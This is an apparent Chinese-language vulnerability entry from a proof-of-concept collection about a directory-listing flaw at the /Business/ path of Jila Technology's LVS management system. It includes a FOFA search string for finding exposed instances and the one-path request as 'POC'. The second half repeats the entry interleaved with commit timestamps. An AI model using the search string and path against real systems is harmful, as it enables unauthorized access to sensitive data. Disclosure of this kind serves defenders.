Awesome-POC/Web应用漏洞/吉拉科技 LVS精益价值管理系统 Business 目录遍历漏洞.md

# 吉拉科技 LVS精益价值管理系统 Business 目录遍历漏洞

## 漏洞描述

杭州吉拉科技有限公司多个系统存在目录遍历漏洞，由于 /Business/ 访问控制不严，攻击者可利用该漏洞获取敏感信息。

## 漏洞影响

吉拉科技 LVS精益价值管理系统

## FOFA

```
"Supperd By 吉拉科技"
```

## 漏洞复现

登录页面

![image-20220525143613247](./images/202205251436458.png)

验证POC

```
/Business/
```

![image-20220525143712687](./images/202205251437757.png)
更新漏洞库：Web应用漏洞/ 2022-05-25 15:32:50 +08:00			`# 吉拉科技 LVS精益价值管理系统 Business 目录遍历漏洞`

			`## 漏洞描述`

			`杭州吉拉科技有限公司多个系统存在目录遍历漏洞，由于 /Business/ 访问控制不严，攻击者可利用该漏洞获取敏感信息。`

			`## 漏洞影响`

			`吉拉科技 LVS精益价值管理系统`

			`## FOFA`

			```
			`"Supperd By 吉拉科技"`
			```

			`## 漏洞复现`

			`登录页面`

更新漏洞 2022-12-05 11:09:28 +08:00			`![image-20220525143613247](./images/202205251436458.png)`
更新漏洞库：Web应用漏洞/ 2022-05-25 15:32:50 +08:00
			`验证POC`

			```
			`/Business/`
			```

更新漏洞 2022-12-05 11:09:28 +08:00			`![image-20220525143712687](./images/202205251437757.png)`